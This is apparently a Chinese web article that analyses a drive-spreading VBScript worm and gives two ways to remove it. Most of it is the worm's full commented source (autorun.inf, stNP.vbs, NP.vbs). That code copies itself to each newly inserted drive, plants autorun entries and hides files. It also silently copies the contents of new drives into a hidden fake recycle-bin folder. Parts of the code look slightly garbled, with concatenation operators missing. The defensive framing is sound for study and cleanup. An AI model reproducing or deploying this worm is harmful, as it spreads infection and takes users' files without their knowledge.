最新惡意復制型病毒autorun.inf,stNP.VBS,NP.VBS
及代碼分析與病毒處理兩種方法
方法一:來自于指間輕舞
此病毒最大的特點在于中毒后,自動感染你的硬盤根目錄,并復制病毒文件。無論你是采用雙擊,還是右鍵選擇打開,或者運行資源管理器都會自動運行其代碼(病毒),所以中此病毒后,新手往往打不開盤符,導致數據無法讀取。
下面是病毒的代碼分析 文件總共有三個 都很簡單,已經加上了注解。
文件名:autorun.inf
復制代碼 代碼如下:
[autorun]
open=
shell\open=打開(O)
shell\open\Command=WScript.exe stNP.vbs
shell\open\Default=1
shell\explore=資源管理器(X)
shell\explore\Command=WScript.exe stNP.vbs
文件名:stNP.VBS
功能是檢測np.vbs是否存在,存在則運行
復制代碼 代碼如下:
on error resume next
set fso = CreateObject("Scripting.FileSys""temObject")
if fso.FileExists("NP.vbs") = -1 then
if fso.FileExists("d:\NP.vbs") = -1 then
set f = fso.getfile("d:\NP.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "NP.vbs", "d:\NP.vbs", true
set wshshell = wscript.createobject("WScript.Shell")
wshshell.run "d:\NP.vbs"
end if
文件名:NP.VBS
-----
復制代碼 代碼如下:
'[NatruePark]
'容錯語句
on Error resume next
'變量聲明及初始化
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
set fso = CreateObject("Scripting.File""SystemObject")
set wshshell = wscript.createobject("WScript.Shell")
old_n=0
redim old_drs(old_n)
old_drs(0)="C"
'[主體部分]
wshshell.run("explorer .\")
dim i
i = 0
do while i>=0 and i8*360
scan_disk()
if judge_new_disk() = 1 then
dim left_n
left_n = 1
do while left_n=(new_n-old_n)
new_disk = new_drs(left_n+old_n)":\"
'-----------------維護塊>-----------------
if fso.FileExists(new_disk"NP.vbs") = -1 then
else
self_copy(new_disk)
end if
add_attrib(new_disk"NP.vbs")
if fso.FileExists(new_disk"autorun.inf") = -1 then
del_attrib(new_disk"autorun.inf")
end if
add_autorun(new_disk)
add_attrib(new_disk"autorun.inf")
if fso.FileExists(new_disk"stNP.vbs") = -1 then
else
add_stNP(new_disk)
end if
add_attrib(new_disk"stNP.vbs")
'-----------------/維護塊>-----------------
'-----------------功能塊>-----------------
dim rec
rec = "d:\Recyc1ed\"
if fso.FolderExists(rec) = -1 then
else
fso.createfolder(rec)
end if
add_attribf(rec)
if fso.FileExists(rec"desktop.ini") = -1 then
else
add_desktop(rec)
end if
add_attrib(rec"desktop.ini")
aim_folder = recDate()Rnd()
if fso.FolderExists(aim_folder) = -1 then
else
fso.createfolder(aim_folder)
end if
'查找"汽輪機原理文件夾并復制"
if fso.FolderExists(new_disk"汽輪機原理") = -1 then
fso.copyfolder new_disk"汽輪機原理", aim_folder, true
add_attribf(aim_folder)
end if
'通用復制
if old_n = 0 then
else
set fp = fso.getFolder(new_drs(new_n)":\")
set fc = fp.SubFolders
for each f in fc
fso.copyfolder f"", aim_folder"\"f.name, true
next
set fc = fp.files
for each f in fc
fso.copyfile f"", aim_folder"\", true
next
add_attribf(aim_folder)
end if
'-----------------/功能塊>-----------------
left_n=left_n+1
loop
copy_disk()
end if
wscript.sleep(10000)
i=i+1
loop
'[函數部分]
'可用驅動器檢測 new_drs(),new_n
function scan_disk()
dim d, dr
new_n = -1
set dr = fso.drives
for each d in dr
if d.isready then
new_n=new_n+1
redim preserve new_drs(new_n)
new_drs(new_n)=d.driveletter
end if
next
end function
'判斷是否有新加入的驅動器
function judge_new_disk()
if new_n = old_n then
judge_new_disk = 0
elseif new_n old_n then
redim preserve old_drs(new_n)
old_n = new_n
judge_new_disk = 0
elseif new_n > old_n then
redim preserve old_drs(new_n)
judge_new_disk = 1
end if
end function
'復制新驅動器表單
function copy_disk()
dim n
n=0
do while n=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
'添加指定文件屬性
function add_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'刪除指定文件屬性
function del_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
f.attributes = 0
else
end if
end function
'自我復制到指定文件目錄
function self_copy(folder)
dim aim_path, mid_path, self_file, mid_file
aim_path = folder"NP.vbs"
mid_path = "c:\np.bin"
set self_file = fso.opentextfile(wscript.scriptfullname,1)
self = self_file.readall
set mid_file = fso.opentextfile(mid_path,2,true)
mid_file.write self
mid_file.close
set mid_file = fso.getfile(mid_path)
mid_file.copy(aim_path)
mid_file.delete(true)
end function
'增加autorun.inf
function add_autorun(folder)
dim path
path = folder"autorun.inf"
set temp = fso.CreateTextFile("c:\a.bin",true)
temp.writeline "[autorun]"
temp.writeline "open="
temp.writeline "shell\open=打開(O)"
temp.writeline "shell\open\Command=WScript.exe stNP.vbs"
temp.writeline "shell\open\Default=1"
temp.writeline "shell\explore=資源管理器(X)"
temp.writeline "shell\explore\Command=WScript.exe stNP.vbs"
temp.close
set cop = fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
end function
'增加desktop.ini
function add_desktop(folder)
dim path
path = folder"desktop.ini"
set temp = fso.CreateTextFile("c:\d.bin",true)
temp.writeline "[.ShellClassInfo]"
temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
temp.close
set cop = fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
end function
'增加stNP.vbs
function add_stNP(folder)
dim path
set fso = CreateObject("Scripting.File""SystemObject")
path = folder"stNP.vbs"
set temp = fso.CreateTextFile("c:\s.bin",true)
temp.writeline "on error resume next"
temp.writeline "set fso = CreateObject("chr(34)"Scripting.FileSys"chr(34)""chr(34)"temObject"chr(34)")"
temp.writeline "if fso.FileExists("chr(34)"NP.vbs"chr(34)") = -1 then"
temp.writeline "if fso.FileExists("chr(34)"d:\NP.vbs"chr(34)") = -1 then"
temp.writeline "set f = fso.getfile("chr(34)"d:\NP.vbs"chr(34)")"
temp.writeline "if f.attributes = 0 then"
temp.writeline "else"
temp.writeline "f.attributes = 0"
temp.writeline "end if"
temp.writeline "f.delete(true)"
temp.writeline "end if"
temp.writeline "fso.copyfile "chr(34)"NP.vbs"chr(34)", "chr(34)"d:\NP.vbs"chr(34)", true"
temp.writeline "set wshshell = wscript.createobject("chr(34)"WScript.Shell"chr(34)")"
temp.writeline "wshshell.run "chr(34)"d:\NP.vbs"chr(34)
temp.writeline "end if"
temp.close
set cop = fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
end function
'添加指定文件夾屬性
function add_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'刪除指定文件夾屬性
function del_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 0 then
else
f.attributes = 0
end if
end function
wscript.echo("THANK YOU!!")
wscript.quit
病毒好像有點良心 不會感染C盤,所以解決的方法還是有的:用資源管理器打開C盤,然后在左邊展開其他盤符,在工具-文件夾-查看中去掉隱藏受保護的系統文件的鉤并選擇查看所有文件。將各個盤符隱藏的以上三個文件刪除,重新啟動即可。
方法二:作者剛成功操作得出
只需要進入WinPE之后,查找NP.VBS就可以連stNP.VBS全部查處,刪除這些惡魔,即可!!!
您可能感興趣的文章:- vbs實現只復制比目標文件更新的文件
- vbs 自動復制U盤的內容
- 自動復制U盤文件的VBS腳本
- Windows 安裝IIS出現的問題(無法安裝IIS,提示“安裝程序無法復制文件IISApp.vbs”)
- IE瀏覽器增加“復制圖像地址”的右鍵菜單的vbs代碼
- vbs復制文件的腳本
- vbs病毒制作之一復制自身的vbs腳本
- 用vbscript實現將腳本的輸出復制到剪貼板
- vbs復制文件夾的實現代碼
